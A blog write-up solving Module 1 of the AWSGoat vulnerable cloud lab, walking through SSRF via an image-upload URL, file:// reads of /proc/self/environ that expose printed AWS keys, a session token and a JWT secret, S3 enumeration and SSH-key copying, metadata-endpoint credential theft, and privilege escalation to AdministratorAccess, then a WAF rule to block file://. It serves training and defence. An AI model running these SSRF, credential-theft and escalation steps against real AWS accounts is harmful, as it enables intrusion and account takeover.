Open in app

Sign in

Write

Sign in

AWSGoat solution Module 1

n00🔑
6 min readFeb 8, 2025

Deploying the lab:

  1. Fork the repo.
  2. Enable the Actions.

3. Add Keys as secrets.
AWS_ACCESS_KEY
AWS_SECRET_ACCESS_KEY

4. Run the workflow for deployment.

https://d8on2u6jj9.execute-api.us-east-1.amazonaws.com/prod/react

Server Side Request Forgery SSRF:

user1@pdfmerge.work : tester****@1**

After logging in. Try creating a new post. Capture the upload image request, when you specify the remote URL where the image is hosted.

We get the URL of the image uploaded to a s3 bucket.

Changing the URL to that of the burp collaborator.

We will be able to see the HTTP and DNS interaction in the burp collaborator.

This confirms requests are being made from serverside to a URL which is coming from user-supplied input.

Reading internal files using file:// protocol. We are able to read /etc/hosts file.

Reading env variables:

AWS_ACCESS_KEY_ID: ASIAYS2NSRAW65N2JVRASHLVL
AWS_DEFAULT_REGION: us-east-1
AWS_EXECUTION_ENV: AWS_Lambda_python3.9
AWS_LAMBDA_FUNCTION_MEMORY_SIZE: 256
AWS_LAMBDA_FUNCTION_NAME: blog-application-data
AWS_LAMBDA_FUNCTION_VERSION: $LATEST
AWS_LAMBDA_INITIALIZATION_TYPE: on-demand
AWS_LAMBDA_LOG_GROUP_NAME: /aws/lambda/blog-application-data
AWS_LAMBDA_LOG_STREAM_NAME: 2025/02/07/[$LATEST]9fc0cac072194557926b0ff1dec29176
AWS_LAMBDA_RUNTIME_API: 127.0.0.1:9001
AWS_REGION: us-east-1
AWS_SECRET_ACCESS_KEY: nViOAa3jsScAfNRCtT9O96jfkLmAPgS0W/oWIpmr
AWS_SESSION_TOKEN: IQoJb3JpZ2luX2VjEGQaCXVzLWVhc3QtMSJGMEQCIB17gv87ugAnhUcs8k17YYphHSAYIRCTWeyChzNHFf3mAiBOaimG6BoeHjqlgZ8j/ZQ8XmHbEdfDVo+xNwa7Pnr6jCr+Agh8EAAaDDU5MDE4MzgyNzUwMSIMncMn+FkgPPJ6kZrfKtsCxSyaqaz8sujnHYRUa/TAIEnVBXnKUCyYB8H1lX31ipF+Irr1sum8d+GDQiKQwcdF2mk/REfl2DgyZUV/mExmHlyi8LG3QdRf1fn4991RUqGFwRjGAgzDWjL6IDxs6QMLsOBjbmq+U9yqVcbgcJH8AiWTNTMoNIwhAfSBlRlK2HGMV6cunBAgMxX6/drFU93KYc3s+rzLup/YwsMdIdk50l8t+3KOHliUGm7HrQUCkN5asKroyXjH0Uj/ZNGLvMmRqvtflaZUa2Lur+Boj6SjiVGFS0cyW0djXuPxySOXfiPbJ0uZiF8JT9oERrz3WRsX5ToO2CK43dqqqGVw1EVCUKaJsf9YqIHXWhmPmpqnDVdvWu7KJ0Kb7q3/glkVk5RfTkROXkiZXOKLROf4fOP///AGGwkwxiGb2LddgwscG0jLm49zJUtPS/MaB8u03NiYs656qmYdSdntsrIwm7iZvQY6nwEJnBSjReciTtLkSIrzvpGkoppGAtpUMWK93sQKufZUVWkyZOuR9x+OdqAaRxW9r3aa10iBwJC1z+543XbbrjGGxIlBJ+Q4wzgahWTbip6kj3v3AmUjb+ywkZGn5ybk+U70OUnn93qjWtTcI8B1AT3JVNh9d1V0gjMLkB4p9O9ExOUi+qJABDQyLtK46jaFZRmagmdvmQBuZHNGdyTvfns=
AWS_XRAY_CONTEXT_MISSING: LOG_ERROR_HANDLER
AWS_XRAY_DAEMON_ADDRESS: 169.254.79.129
AWS_XRAY_DAEMON_PORT: 2000
_LAMBDA_TELEMETRY_LOG_FD: 3
JWT_SECRET: T2BYL6#]zc>Byuzu
LAMBDA_RUNTIME_DIR: /var/runtime
LAMBDA_TASK_ROOT: /var/task
LD_LIBRARY_PATH: /var/lang/lib:/lib64:/usr/lib64:/var/runtime:/var/runtime/lib:/var/task:/var/task/lib:/opt/lib
LANG: en_US.UTF-8
PATH: /var/lang/bin:/usr/local/bin:/usr/bin/:/bin:/opt/bin
PWD: /var/task
TZ: :UTC

Brute forcing/Enumerating permissions-

#Listing s3 buckets
aws s3api list-buckets
aws s3 ls

Found 3 buckets:

2025–02–05 23:34:23 dev-blog-awsgoat-bucket-590183827501
2025–02–05 23:34:23 do-not-delete-awsgoat-state-files-590183827501
2025–02–05 23:34:23 production-blog-awsgoat-bucket-590183827501

Checking dev-blog-awsgoat-bucket-590183827501 bucket. We found .ssh folder containing ssh keys.

aws s3 ls s3://dev-blog-awsgoat-bucket-590183827501 --recursive
aws s3 cp s3://dev-blog-awsgoat-bucket-590183827501/shared/files/.ssh/ /tmp/bucket/ --recursive

Scanning All the IPs for open ports for common services.

nmap -Pn -vv 10.25.14.6 34.207.133.229 35.153.184.88 10.25.14.106 172.16.84.59 172.16.87.25 172.22.26.8 10.0.48.71 --top-ports 20 --min-rate 2000 -n

We are able to move laterally to an ec2 instance.

Checking the IAM permissions attached to it-

curl 169.254.169.254/latest/meta-data/iam/security-credentials/AWS_GOAT_ROLE

Logging in as AWS_GOAT_ROLE-

We can brute-force permissions for AWS_GOAT_ROLE -

Try to List the attached policies to AWS_GOAT_ROLE-

arn:aws:iam::590183827501:policy/dev-ec2-lambda-policies
arn:aws:iam::aws:policy/AmazonS3FullAccess

Upon checking the “dev-ec2-lambda-policies” policy, I came to know that it has permissions like “create policy” and “attach policy” which can be used for privesc.

But there is a caveat Attach policy permissions are only allowed on

blog_app_lambda-data role and arn:aws:lambda:us-east-1:590183827501:function:blog-application-data lambda function.

v1 is being used

Exploitation Steps

1️⃣ Attach AdministratorAccess to the Lambda’s IAM role
If you have iam:AttachRolePolicy, you can grant admin privileges:

aws iam attach-role-policy --role-name blog_app_lambda_data --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

➡️ This would give the Lambda function full control over AWS resources.

We already have access to lambda “blog-application-data” function’s session via SSRF. We have successfully escalated our privileges to AdministratorAccess.

aws iam get-account-authorization-details --profile lambda

Protections-

AWS WAF Rule for Server Side Request Forgery(SSRF)

Step 1: Identify the Attack Pattern

The attack involves a malicious request attempting to access internal files using the file:// protocol:

GET /v1/save-content?value=file:///proc/self/environ HTTP/2

To block this, we’ll create an AWS WAF rule that detects and blocks requests containing file:// in the query string.

Step 2: Create a Web ACL

  1. Go to the AWS Management Console:
  • Navigate to AWS WAF & Shield.

2. Create a Web ACL:

  • Click Create web ACL.
  • Name your Web ACL (e.g., SSRF-Protection-WebACL).
  • Select the AWS resource you want to protect (e.g., API Gateway, CloudFront, or ALB).
  • Choose the region where your resource is deployed.

Step 3: Add a Rule to Block file://

  1. Add a Rule:
  • Click Add rules and select Add my own rules and rule groups.
  • Rule type: Regular rule.

2. Configure the Rule:

  • Name: Block-File-Protocol.
  • Action: Block.
  • If a request: matches the statement.
  • Inspect: Query string.
  • Match type: Contains string.
  • String to match: file://.
  • Text transformation: Select URL decode (to handle encoded payloads like file%3A%2F%2F).

3. Save the Rule:

  • Add the rule to your Web ACL.

Step 4: Associate the Web ACL with Your Resource

  • After creating the Web ACL, associate it with the resource you want to protect (e.g., API Gateway, CloudFront, or ALB).
  • In the AWS WAF console:
  • Select your Web ACL.
  • Click Associated AWS resources.
  • Click Add AWS resources.
  • Select your API Gateway, CloudFront distribution, or ALB.
  • Click Add.

Step 5: Test the Configuration

  • Send a test request to your endpoint with the file:// payload:

GET /v1/save-content?value=file:///proc/self/environ HTTP/2

  • Verify that the request is blocked by AWS WAF.

IAM Access Analyzer

IAM Access Analyzer helps identify overly permissive IAM policies and unintended external access in AWS.

AWS
Cloud Security
Ethical Hacking

--

--

n00🔑
n00🔑

Written by n00🔑

492 Followers
6 Following

Computer Security Enthusiast. Usually plays HTB (ID-23862). https://www.youtube.com/@pswalia2u https://www.linkedin.com/in/pswalia2u/ Instagram @pswalia4u

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Rules

Terms

Text to speech